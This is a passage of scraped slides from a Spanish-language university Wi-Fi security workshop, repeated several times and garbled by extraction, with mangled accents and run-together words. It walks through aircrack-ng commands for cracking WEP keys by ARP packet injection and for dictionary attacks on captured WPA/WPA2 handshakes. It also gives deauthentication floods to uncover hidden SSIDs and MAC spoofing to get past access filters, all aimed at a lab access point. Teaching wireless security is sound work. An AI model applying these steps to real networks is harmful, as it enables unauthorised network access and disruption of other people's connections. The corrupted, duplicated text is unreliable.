Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 48: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 49: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 50: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

